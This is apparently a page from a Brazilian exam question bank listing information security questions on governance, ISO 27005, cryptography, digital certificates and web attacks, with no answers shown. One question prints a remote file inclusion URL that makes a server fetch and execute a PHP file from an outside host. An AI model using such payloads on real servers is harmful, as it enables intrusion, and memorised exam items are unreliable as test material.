voltar

Questões de Concursos

selecione os filtros para encontrar suas questões de concursos e clique no botão abaixo para filtrar e resolver.

Publicidade

ID: 1038345
Segurança da Informação
Conceitos Básicos em Segurança da Informação
CESPE CEBRASPE
BDMG
Infraestrutura e Segurança Cibernética
2025

A respeito de governança de segurança da informação e de testes de segurança, julgue o item subsecutivo.

No alinhamento estratégico, o planejamento de TI de uma organização é composto de objetivos, de estratégias e do ambiente de operação.

ID: 959498
Segurança da Informação
ICPBrasil
CESPE CEBRASPE
Polícia Federal
Área 3
2018

Softwares desenvolvidos para a Web podem ter diversas vulnerabilidades e cada uma delas pode ser explorada com uma técnica específica. Sendo o ataque bem-sucedido, o atacante tem o controle do sistema. A respeito de características de ataques em software web, julgue o próximo item.

O ataque de sequestro de sessão tem por característica o comprometimento do token de autenticação de um usuário, podendo esse token ser obtido interceptando-se a comunicação ou predizendo-se um token válido.

ID: 1084183
Segurança da Informação
Norma 27005
FGV
TJ RJ
Áreas de Tecnologia da Informação
2024

A norma ABNT NBR ISO/IEC 27005:2023 é uma ferramenta fundamental para que as organizações possam identificar, analisar e mitigar os riscos relacionados à segurança da informação.

Em relação ao que estabelece essa norma, assinale a afirmativa correta.

ID: 1050149
Segurança da Informação
Backup em Segurança da Informação
FGV
MF
manhã
2024

SSDs externos são meios de armazenamento comumente utilizados por organizações para guardar dados com segurança. Sobre esse meio de armazenamento, é correto afirmar que

ID: 980562
Segurança da Informação
Noções de Segurança
FAU
Prefeitura de Céu Azul PR
Técnico em Informática
2025

A segurança da informação tem como base os denominados pilares da segurança da informação. A capacidade de um sistema de impedir que usuários não autorizados “vejam” determinada informação que foi delegada somente a usuários autorizados a vê-la é definição de qual pilar:

ID: 964446
Segurança da Informação
FCC
TRF 4ª REGIÃO
Operação de Computador

A certificação digital funciona com base em um documento eletrônico e em um recurso, que são denominados, respectivamente, de

ID: 1034880
Segurança da Informação
Autenticação
FGV
MPU
Desenvolvimento de Sistemas
2025

A analista Daniela está implementando o módulo de autenticação de um sistema, com base no protocolo OpenID Connect (OIDC). Na rotina de verificação da autenticação, Daniela deve avaliar se o ID Token, retornado pelo servidor OIDC, foi emitido em um horário considerado válido.

Para avaliar o horário de emissão do token, Daniela deve extrair do ID Token o valor do atributo:

ID: 988040
Segurança da Informação
IBADE
PRODESTES
Desenvolvimento de Sistemas
2024

A entidade responsável no ICP-Brasil pela emissão dos certificados digitais e o tipo de chave utilizada pelo destinatário na criptografia assimétrica são, respectivamente:

ID: 1034433
Segurança da Informação
Análise de Vulnerabilidade e Gestão de Riscos
FGV
TCE RR
Desenvolvedor de Sistemas
2025

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

ID: 889806
Segurança da Informação
ICPBrasil
FUNCERN
IFRN
Área Informática
2024

No IFRN, a servidora Laura enviou uma mensagem criptografada para Giovanna, utilizando criptografia assimétrica. Para codificar o conteúdo da mensagem, Laura deve utilizar a chave

ID: 914920
Segurança da Informação
LJ Assessoria e Planejamento Administrativo Limita
Prefeitura de Dom Eliseu PA
Vigia
2023

Quais são as três etapas principais do processo de autenticação em um sistema de segurança eletrônica?

ID: 961285
Segurança da Informação
CONSULPLAN
TRF 2a REGIÃO
Informática Infraestrutura

A Norma Brasileira ABNT NBR ISO/IEC 27005:2011 é responsável pela Tecnologia da Informação – Técnicas de Segurança – Gestão de riscos de Segurança da Informação, fornecendo diretrizes para o processo de gestão de riscos de segurança da informação, de acordo com os padrões do Sistema de Gestão de Segurança da Informação (SGSI). Os gestores, além do pessoal envolvido com a gestão de riscos de segurança da informação em uma organização, são as pessoas que têm maior interesse nesta norma, ou também entidades externas que dão suporte a essas atividades. Esta norma apresenta diversas atividades que possuem: Entrada; Ação; Diretrizes para implementação; e, Saída. “Trata-se da comunicação que é uma atividade que objetiva alcançar um consenso sobre como os riscos devem ser gerenciados, fazendo uso para tal da troca e/ou partilha das informações sobre o risco entre os tomadores de decisão e as outras partes interessadas.” A afirmativa anterior trata-se de:

ID: 883726
Segurança da Informação
CONTEMAX
Prefeitura de Cubati PB
Técnico em Informática
2024

Qual é o principal objetivo de realizar uma cópia de segurança (backup) de arquivos?

ID: 1052959
Segurança da Informação
Noções de Segurança
CESPE CEBRASPE
HEMOBRÁS
Analista de TI

Acerca de segurança da informação, julgue os próximos itens.

O ciclo de segurança é composto pela identificação das ameaças ao negócio e respectivas medidas de segurança a serem tomadas para reduzir o risco, ou seja, reduzir a probabilidade de incidentes ocorrerem.

ID: 1052963
Segurança da Informação
Plano de Continuidade de Negócios
CESPE CEBRASPE
HEMOBRÁS
Analista de TI

Acerca de segurança da informação, julgue os próximos itens.

Os planos de continuidade de negócios devem ser mantidos atualizados e garantir que as informações sejam classificadas de acordo com seu grau de sigilo preconizado pela política de classificação das informações.

ID: 904769
Segurança da Informação
IV UFG
Prefeitura de Rio Branco AC
Especialização em Segurança da Informação
2024

A segurança em aplicações web constitui um importante requisito que deve ser considerado quando do projeto e implementação, a fim de minimizar as chances de que sofram ataques. Nesse contexto, o ataque é

ID: 907124
Segurança da Informação
ACAFE
CELESC
Infraestrutura Operação e Segurança
2024

Uma empresa de tecnologia está preocupada com a segurança de sua infraestrutura de TI e decidiu contratar uma equipe de segurança para realizar testes de penetração (pentests) e avaliações de vulnerabilidade. O objetivo é identificar e corrigir possíveis fraquezas antes que sejam exploradas por atacantes maliciosos. Qual das seguintes opções descreve corretamente a diferença principal entre um teste de penetração (pentest) e uma avaliação de vulnerabilidade?

ID: 1041275
Segurança da Informação
Criptografia
CESPE CEBRASPE
TRF 6 REGIÃO
Técnico Judiciário Desenvolvimento de Sistemas
2025

Acerca de prevenção e combate a ataques a redes de computadores, criptografia e certificação digital, julgue o item seguinte.

Os sistemas de criptografia assimétrica utilizam uma chave compartilhada entre o emissor e o receptor dos dados, sendo indicados para ambientes de baixo nível de segurança.

ID: 954050
Segurança da Informação
UECE CEV
PGECE
Análise e Desenvolvimento de Sistemas
2025

Assinale a opção que corresponde à definição dada pelo National Institute of Standards and Technology (NIST) para o conceito de Vulnerabilidade.
Página 104
Publicidade